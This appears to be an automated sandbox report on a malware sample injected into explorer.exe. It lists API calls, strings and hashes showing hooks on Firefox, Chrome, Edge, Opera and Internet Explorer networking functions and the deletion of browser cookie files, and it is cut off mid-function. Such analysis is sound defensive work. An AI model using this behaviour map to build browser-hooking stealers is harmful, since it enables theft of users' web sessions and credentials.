CreateToolhelp32Snapshot 70->73 76 383c7a-383c8e Process32First 73->76 77 383d7d-383d88 Sleep 73->77 81 383d6e-383d70 76->81 77->73 79->80 80->70 86 383c93-383ca5 lstrcmpiA 81->86 87 383d76-383d77 FindCloseChangeNotification 81->87 82->53 92 383af7-383b01 82->92 89 383cda-383ce3 call 3812aa 86->89 90 383ca7-383cb5 lstrcmpiA 86->90 87->77 97 383d62-383d68 Process32Next 89->97 98 383ce5-383cee call 381305 89->98 90->89 91 383cb7-383cc5 lstrcmpiA 90->91 91->89 94 383cc7-383cd4 call 382ea8 91->94 92->63 94->89 94->97 97->81 98->97 102 383cf0-383cf7 call 381320 98->102 102->97 105 383cf9-383d06 call 381274 102->105 105->97 108 383d08-383d5d lstrcmpiA call 381090 call 381fe5 call 381090 105->108 108->97
                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00383886
                        • GetCurrentProcessId.KERNEL32(00000001), ref: 0038389B
                        • wsprintfA.USER32 ref: 003838B6
                          • Part of subcall function 0038118D: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 003811A9
                          • Part of subcall function 0038118D: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 003811C1
                          • Part of subcall function 0038118D: lstrlen.KERNEL32(?,00000000), ref: 003811C9
                          • Part of subcall function 0038118D: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 003811D4
                          • Part of subcall function 0038118D: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 003811EE
                          • Part of subcall function 0038118D: wsprintfA.USER32 ref: 00381205
                          • Part of subcall function 0038118D: CryptDestroyHash.ADVAPI32(?), ref: 0038121E
                          • Part of subcall function 0038118D: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00381228
                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 003838CD
                        • GetLastError.KERNEL32 ref: 003838D3
                        • RtlInitializeCriticalSection.NTDLL(00386038), ref: 003838F3
                        • PathFindFileNameA.SHLWAPI(?), ref: 003838FA
                        • lstrcat.KERNEL32(00385CDE,00000000), ref: 00383910
                        • Sleep.KERNEL32(000001F4), ref: 0038392A
                        • lstrcmpiA.KERNEL32(00000000,firefox.exe), ref: 0038393C
                        • GetCommandLineW.KERNEL32(?), ref: 0038394F
                        • GetModuleHandleA.KERNEL32(kernel32.dll,VirtualQuery), ref: 0038397E
                        • GetProcAddress.KERNEL32(00000000), ref: 00383987
                        • GetModuleHandleA.KERNEL32(nspr4.dll,PR_GetDescType), ref: 003839AF
                        • GetProcAddress.KERNEL32(00000000), ref: 003839B2
                        • GetModuleHandleA.KERNEL32(nss3.dll,PR_GetDescType), ref: 003839C4
                        • GetProcAddress.KERNEL32(00000000), ref: 003839C7
                        • GetModuleHandleA.KERNEL32(nspr4.dll,PR_Write), ref: 003839E1
                        • GetProcAddress.KERNEL32(00000000), ref: 003839E4
                        • GetModuleHandleA.KERNEL32(nss3.dll,PR_Write), ref: 003839EC
                        • GetProcAddress.KERNEL32(00000000), ref: 003839EF
                        • lstrcmpiA.KERNEL32(00000000,chrome.exe), ref: 00383A6D
                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00383A78
                        • StrStrIA.SHLWAPI(00000000), ref: 00383A7B
                        • lstrcmpiA.KERNEL32(00000000,opera.exe), ref: 00383A8E
                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00383A9D
                        • StrStrIA.SHLWAPI(00000000), ref: 00383AA0
                        • GetModuleHandleA.KERNEL32(opera.dll), ref: 00383ABF
                        • GetModuleHandleA.KERNEL32(opera_browser.dll), ref: 00383ACC
                        • CommandLineToArgvW.SHELL32(00000000), ref: 00383956
                          • Part of subcall function 003816C7: GetCurrentProcessId.KERNEL32 ref: 003816D9
                          • Part of subcall function 003816C7: GetCurrentThreadId.KERNEL32 ref: 003816E1
                          • Part of subcall function 003816C7: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 003816F1
                          • Part of subcall function 003816C7: Thread32First.KERNEL32(00000000,0000001C), ref: 003816FF
                          • Part of subcall function 003816C7: CloseHandle.KERNEL32(00000000), ref: 00381758
                        • lstrcmpiA.KERNEL32(00000000,iexplore.exe), ref: 00383A10
                        • lstrcmpiA.KERNEL32(00000000,microsoftedgecp.exe), ref: 00383A20
                        • lstrcmpiA.KERNEL32(00000000,msedge.exe), ref: 00383A30
                        • GetCommandLineA.KERNEL32(NetworkService), ref: 00383A47
                        • StrStrIA.SHLWAPI(00000000), ref: 00383A4A
                        • GetModuleHandleA.KERNEL32(chrome.dll), ref: 00383A5F
                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestA), ref: 00383B2C
                        • GetProcAddress.KERNEL32(00000000), ref: 00383B35
                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpSendRequestW), ref: 00383B52
                        • GetProcAddress.KERNEL32(00000000), ref: 00383B55
                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetWriteFile), ref: 00383B72
                        • GetProcAddress.KERNEL32(00000000), ref: 00383B75
                        • GetModuleHandleA.KERNEL32(wininet.dll,HttpQueryInfoA), ref: 00383B99
                        • GetProcAddress.KERNEL32(00000000), ref: 00383B9C
                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetQueryOptionA), ref: 00383BA9
                        • GetProcAddress.KERNEL32(00000000), ref: 00383BAC
                        • GetModuleHandleA.KERNEL32(wininet.dll,InternetGetCookieA), ref: 00383BB9
                        • GetProcAddress.KERNEL32(00000000), ref: 00383BBC
                          • Part of subcall function 00381C08: RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 00381C42
                        • RtlExitUserThread.NTDLL(00000000), ref: 00383BD9
                        • wsprintfA.USER32 ref: 00383C1F
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00383C69
                        • Process32First.KERNEL32(00000000,?), ref: 00383C88
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00383D77
                        • Sleep.KERNELBASE(000003E8), ref: 00383D82
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: HandleModule$AddressProc$Cryptlstrcmpi$CommandLine$CreateHash$CurrentProcesswsprintf$CloseContextFileFindFirstHeapNameSleepSnapshotThreadToolhelp32$AcquireAllocateArgvChangeCriticalDataDestroyErrorExitInitializeLastMemoryMoveMutexNotificationParamPathProcess32ReleaseSectionThread32Userlstrcatlstrlen
                        • String ID: %s%d%d%d$%s%s$HttpQueryInfoA$HttpSendRequestA$HttpSendRequestW$InternetGetCookieA$InternetQueryOptionA$InternetWriteFile$NetworkService$PR_GetDescType$PR_Write$VirtualQuery$chrome.dll$chrome.exe$fgclearcookies$firefox.exe$iexplore.exe$kernel32.dll$microsoftedgecp.exe$msedge.dll$msedge.exe$nspr4.dll$nss3.dll$opera.dll$opera.exe$opera_browser.dll$wininet.dll
                        • API String ID: 2739256675-2618538661
                        • Opcode ID: e3c019fae88fa06b646be0774629389ab5a8ef9ad991e8f177a6133951da0b9d
                        • Instruction ID: 71fbb07791ef1b64a45fb3c035b08d81c53850a101bb40457932b15d8079d23c
                        • Opcode Fuzzy Hash: e3c019fae88fa06b646be0774629389ab5a8ef9ad991e8f177a6133951da0b9d
                        • Instruction Fuzzy Hash: E0A1E1F1A44316ABC71377719C0AE6F7A9C9F40B41F1205E4F901EB691EB79CE028BA5
                        Function 003815BE Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 87filestringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 003815EB
                        • FindFirstFileW.KERNELBASE(00000000,?), ref: 003815F7
                        • lstrcmpiW.KERNEL32(?,003841C8), ref: 00381623
                        • lstrcmpiW.KERNEL32(?,003841CC), ref: 00381633
                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0038164C
                        • PathMatchSpecW.SHLWAPI(?,Cookies*), ref: 00381661
                        • PathCombineW.SHLWAPI(00000000,?,?), ref: 0038167E
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 0038169C
                        • FindClose.KERNELBASE(00000000), ref: 003816AB
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Path$CombineFind$FileHeaplstrcmpi$AllocateCloseFirstMatchNextProcessSpec
                        • String ID: *.*$Cookies*
                        • API String ID: 4256701249-3228320225
                        • Opcode ID: 88a7450bd3dfc78d77b4960b903adaf12b34a87ac3f620225f67d04eb0e85639
                        • Instruction ID: 7ac236003d88c8868c4a6ddd4bf537e9455a16956707f3257617ab48222bf0dd
                        • Opcode Fuzzy Hash: 88a7450bd3dfc78d77b4960b903adaf12b34a87ac3f620225f67d04eb0e85639
                        • Instruction Fuzzy Hash: 2D2196712043165BD312BB70AC49A7F77ACEB89781F0505A9F981D7241EB34CD4647A2
                        Function 003814D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 70fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 003813FE: wsprintfW.USER32 ref: 0038142A
                          • Part of subcall function 003813FE: FindFirstFileW.KERNELBASE(00000000,?), ref: 00381439
                          • Part of subcall function 003813FE: wsprintfW.USER32 ref: 00381476
                          • Part of subcall function 003813FE: RemoveDirectoryW.KERNELBASE(00000000), ref: 0038149C
                          • Part of subcall function 003813FE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 003814AF
                          • Part of subcall function 003813FE: FindClose.KERNELBASE(00000000), ref: 003814BA
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • wsprintfW.USER32 ref: 0038150D
                        • FindFirstFileW.KERNELBASE(00000000,?), ref: 0038151C
                        • wsprintfW.USER32 ref: 00381557
                        • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0038156A
                        • DeleteFileW.KERNELBASE(00000000), ref: 00381571
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00381584
                        • FindClose.KERNELBASE(00000000), ref: 0038158F
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                        • String ID: %s%s$*.*
                        • API String ID: 2055899612-705776850
                        • Opcode ID: 3d54ae96db4e307e562a1e2feed1cbc6f444014d1cad67ca451cb7c885c64e6b
                        • Instruction ID: 47c8d518e8941c5f52ae53d874b02aa6715c3eef1477473e1a8878b85bbc103c
                        • Opcode Fuzzy Hash: 3d54ae96db4e307e562a1e2feed1cbc6f444014d1cad67ca451cb7c885c64e6b
                        • Instruction Fuzzy Hash: 1B1129712003055BD313BB349C4DE6F7B9CEFD6755F000598FE4286192EB74898683A6
                        Function 003813FE Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 69fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 246 3813fe-381444 call 381000 wsprintfW FindFirstFileW 249 3814c4-3814d5 call 381011 246->249 250 381446 246->250 252 38144a-38144f 250->252 254 3814a9-3814b7 FindNextFileW 252->254 255 381451-38145c call 3813d7 252->255 254->252 256 3814b9-3814c0 FindClose 254->256 255->254 259 38145e-381499 call 381000 wsprintfW call 3814d8 255->259 256->249 264 38149b-38149c RemoveDirectoryW 259->264 265 3814a2-3814a4 call 381011 259->265 264->265 265->254
                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • wsprintfW.USER32 ref: 0038142A
                        • FindFirstFileW.KERNELBASE(00000000,?), ref: 00381439
                        • wsprintfW.USER32 ref: 00381476
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 0038150D
                          • Part of subcall function 003814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0038151C
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 00381557
                          • Part of subcall function 003814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0038156A
                          • Part of subcall function 003814D8: DeleteFileW.KERNELBASE(00000000), ref: 00381571
                          • Part of subcall function 003814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00381584
                          • Part of subcall function 003814D8: FindClose.KERNELBASE(00000000), ref: 0038158F
                        • RemoveDirectoryW.KERNELBASE(00000000), ref: 0038149C
                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 003814AF
                        • FindClose.KERNELBASE(00000000), ref: 003814BA
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: FileFind$wsprintf$CloseFirstHeapNext$AllocateAttributesDeleteDirectoryProcessRemove
                        • String ID: %s%s$%s%s\$*.*
                        • API String ID: 2055899612-4093207852
                        • Opcode ID: b9f33b8079d0dbb338ea9229cae9110476bbe98759e67ce792b401d45d45f9ea
                        • Instruction ID: 6e6d0c5981dbf50cc1e877358dd506f90d3878e976631ce2b9117bc3784d4835
                        • Opcode Fuzzy Hash: b9f33b8079d0dbb338ea9229cae9110476bbe98759e67ce792b401d45d45f9ea
                        • Instruction Fuzzy Hash: 411106702043415BD312BB25DC49ABFB7ECEFD5301F1105ACFA4193192EB754C4A8762
                        Function 00383D8D Relevance: 4.5, APIs: 3, Instructions: 46nativeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 288 383d8d-383d97 call 381274 291 383d99-383dc2 call 381000 RtlMoveMemory 288->291 292 383e03-383e04 288->292 295 383de8-383dfc NtUnmapViewOfSection 291->295 296 383dc4-383de2 call 381000 RtlMoveMemory 291->296 298 383e0a-383e15 call 383be1 295->298 299 383dfe-383dff 295->299 296->295 305 383e20-383e23 298->305 306 383e17-383e1b call 383d8d 298->306 299->292 301 383e01-383e05 call 383862 299->301 301->298 306->305
                        APIs
                          • Part of subcall function 00381274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00381281
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00383DAF
                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00383DE2
                        • NtUnmapViewOfSection.NTDLL(000000FF), ref: 00383DEB
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: HeapMemoryMove$AllocateProcessQuerySectionUnmapViewVirtual
                        • String ID:
                        • API String ID: 4050682147-0
                        • Opcode ID: c9da5e0b26e41bc5a6e485e956726fe80ab72b35903608830fe7235e442c5b36
                        • Instruction ID: 5e00558b542de689d947fc64fea0eecdd76035c0c5b96793fb0345e15d74969c
                        • Opcode Fuzzy Hash: c9da5e0b26e41bc5a6e485e956726fe80ab72b35903608830fe7235e442c5b36
                        • Instruction Fuzzy Hash: B501D4B1408301AFCB2BBB64EC59BA77B6CEB40711F1189D9B4158B3A1CA369B41CB65
                        Function 00382EA8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 19COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 312 382ea8-382ebc StrStrIA 313 382ecd-382ed1 312->313 314 382ebe-382eca call 382e1b 312->314 314->313
                        APIs
                        • StrStrIA.KERNELBASE(chrome.exe|opera.exe|msedge.exe,?,00000000,?,00383CD2), ref: 00382EB4
                          • Part of subcall function 00382E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00382EC5), ref: 00382E27
                          • Part of subcall function 00382E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00382E52
                          • Part of subcall function 00382E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00382E7F
                          • Part of subcall function 00382E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00382E92
                        Strings
                        • chrome.exe|opera.exe|msedge.exe, xrefs: 00382EAB
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Process$InformationQuery$Open
                        • String ID: chrome.exe|opera.exe|msedge.exe
                        • API String ID: 4117927671-3743313796
                        • Opcode ID: 0bcf129d6579d3653d1a83a9c25fb2b28483a1501c1bf0ee781f5627adc96094
                        • Instruction ID: 47f75e2a9d687c196196debc509ce4a953d2d33716aaae65c25be26faf0df4ac
                        • Opcode Fuzzy Hash: 0bcf129d6579d3653d1a83a9c25fb2b28483a1501c1bf0ee781f5627adc96094
                        • Instruction Fuzzy Hash: 1DD0C93231472217572E767A6C1A96F958DCBC6A6230641BEE942D7650EA909C4343A4
                        Function 00383709 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73stringsleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00381374
                          • Part of subcall function 00381363: Process32First.KERNEL32(00000000,?), ref: 00381393
                          • Part of subcall function 00381363: FindCloseChangeNotification.KERNELBASE(00000000), ref: 003813CB
                          • Part of subcall function 00381363: lstrcmpiA.KERNEL32(?), ref: 003813A3
                          • Part of subcall function 00381363: Process32Next.KERNEL32(00000000,00000128), ref: 003813C0
                        • Sleep.KERNELBASE(000003E8,?,00000000,00000001,?,?,00383839,?,00383C53,00000001), ref: 00383731
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00383839,?,00383C53,00000001), ref: 00383752
                        • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00383764
                          • Part of subcall function 003815BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,74E2F770,00000000,75F0B2E0,76F183D0), ref: 003815EB
                          • Part of subcall function 003815BE: FindFirstFileW.KERNELBASE(00000000,?), ref: 003815F7
                          • Part of subcall function 003815BE: lstrcmpiW.KERNEL32(?,003841C8), ref: 00381623
                          • Part of subcall function 003815BE: lstrcmpiW.KERNEL32(?,003841CC), ref: 00381633
                          • Part of subcall function 003815BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 0038164C
                          • Part of subcall function 003815BE: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0038169C
                          • Part of subcall function 003815BE: FindClose.KERNELBASE(00000000), ref: 003816AB
                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 0038377A
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00383839,?,00383C53,00000001), ref: 00383783
                        • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 0038378F
                        • RtlZeroMemory.NTDLL(00000000,00001000), ref: 003837A3
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,00383839,?,00383C53,00000001), ref: 003837AC
                        • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 003837B8
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: Path$Find$FolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateChangeCreateNotificationProcessSleepSnapshotToolhelp32
                        • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                        • API String ID: 3097474925-1175993956
                        • Opcode ID: 4dab4dd73c0695081e66fbac2a8ae5bc3535fe57fd00dba859997805b5ea7ee0
                        • Instruction ID: aceb489ddcab96783bf93d191587df2f07a8d64a1ba713b26229507b0e38636d
                        • Opcode Fuzzy Hash: 4dab4dd73c0695081e66fbac2a8ae5bc3535fe57fd00dba859997805b5ea7ee0
                        • Instruction Fuzzy Hash: 9A118EA438135623E62733661C82FAF658DDF96B91F1100A4F6456EAC2DEC4DE4243AA
                        Function 00383BE1 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130stringsleepprocessCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • wsprintfA.USER32 ref: 00383C1F
                          • Part of subcall function 00381235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0038123F
                          • Part of subcall function 00381235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00383C33), ref: 00381251
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00383C69
                        • Process32First.KERNEL32(00000000,?), ref: 00383C88
                        • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 00383CA1
                        • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 00383CB1
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00383CC1
                        • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00383D12
                        • Process32Next.KERNEL32(00000000,00000128), ref: 00383D68
                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00383D77
                        • Sleep.KERNELBASE(000003E8), ref: 00383D82
                          • Part of subcall function 00381141: lstrlen.KERNEL32(?,?,?,00000000,?,003829DD,00000001), ref: 00381150
                          • Part of subcall function 00381141: lstrlen.KERNEL32(:method POST,?,00000000,?,003829DD,00000001), ref: 00381155
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateChangeCloseCreateFindFirstMappingNextNotificationOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                        • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                        • API String ID: 1384999969-2554907557
                        • Opcode ID: a13f10f1ef2a6aa37791831c6500a023bfbf757b450761b7207fdc9e69f2b899
                        • Instruction ID: e9993a11c7bb23ee0e7e4135a7289df10d13d92e6bb934a7f3a9d90067fa0b25
                        • Opcode Fuzzy Hash: a13f10f1ef2a6aa37791831c6500a023bfbf757b450761b7207fdc9e69f2b899
                        • Instruction Fuzzy Hash: 8D4127B12043029BC617FB74DC85A7F77ADAF84B40F0105D8F9519B6D1EB20DE0A87A6
                        Function 003835D4 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64stringsleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00381374
                          • Part of subcall function 00381363: Process32First.KERNEL32(00000000,?), ref: 00381393
                          • Part of subcall function 00381363: FindCloseChangeNotification.KERNELBASE(00000000), ref: 003813CB
                          • Part of subcall function 00381363: lstrcmpiA.KERNEL32(?), ref: 003813A3
                          • Part of subcall function 00381363: Process32Next.KERNEL32(00000000,00000128), ref: 003813C0
                        • Sleep.KERNELBASE(000003E8,?,00000000,?,0038382F,?,00383C53,00000001), ref: 003835FA
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,0038382F,?,00383C53,00000001), ref: 00383613
                        • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00383623
                        • wsprintfW.USER32 ref: 00383644
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 0038150D
                          • Part of subcall function 003814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0038151C
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 00381557
                          • Part of subcall function 003814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0038156A
                          • Part of subcall function 003814D8: DeleteFileW.KERNELBASE(00000000), ref: 00381571
                          • Part of subcall function 003814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00381584
                          • Part of subcall function 003814D8: FindClose.KERNELBASE(00000000), ref: 0038158F
                          • Part of subcall function 00381011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,003814CB), ref: 00381020
                          • Part of subcall function 00381011: RtlFreeHeap.NTDLL(00000000), ref: 00381027
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,0038382F,?,00383C53,00000001), ref: 00383672
                        • lstrcatW.KERNEL32(00000000,00384614), ref: 00383682
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2942362912.0000000000381000.00000040.80000000.00040000.00000000.sdmp, Offset: 00381000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_381000_explorer.jbxd
                        Similarity
                        • API ID: FileFindHeap$wsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesChangeCreateDeleteFreeNotificationSleepSnapshotToolhelp32lstrcmpi
                        • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                        • API String ID: 877252726-3669280581
                        • Opcode ID: b24347381c73e0d14f7770d56e7f8f4f2c5de0cd3ca21b507422c1e924aa137a
                        • Instruction ID: 1ffc2e5d8cdf6cf90ce1d30bb222e4c5daa59da9efebabbabd16361a3e80ae4d
                        • Opcode Fuzzy Hash: b24347381c73e0d14f7770d56e7f8f4f2c5de0cd3ca21b507422c1e924aa137a
                        • Instruction Fuzzy Hash: 1E11C27434030227E61733655C9AF3E255DDBD2F02F1500E8F606AEAC1EE8408825369
                        Function 003836A1 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37sleepstringCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00381363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00381374
                          • Part of subcall function 00381363: Process32First.KERNEL32(00000000,?), ref: 00381393
                          • Part of subcall function 00381363: FindCloseChangeNotification.KERNELBASE(00000000), ref: 003813CB
                        • Sleep.KERNELBASE(000003E8,?,00000000,?,00383834,?,00383C53,00000001), ref: 003836B3
                          • Part of subcall function 00381000: GetProcessHeap.KERNEL32(00000008,00000208,00381418), ref: 00381003
                          • Part of subcall function 00381000: RtlAllocateHeap.NTDLL(00000000), ref: 0038100A
                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,00383834,?,00383C53,00000001), ref: 003836CC
                        • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 003836DC
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 0038150D
                          • Part of subcall function 003814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0038151C
                          • Part of subcall function 003814D8: wsprintfW.USER32 ref: 00381557
                          • Part of subcall function 003814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0038156A
                          • Part of subcall function 003814D8: DeleteFileW.KERNELBASE(00000000), ref: 00381571
                          • Part of subcall function 003814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00381584
                          • Part of subcall function 003814D8: FindClose.KERNELBASE(00000000), ref: 0038158F
                        Strings
                        Memory Dump Source
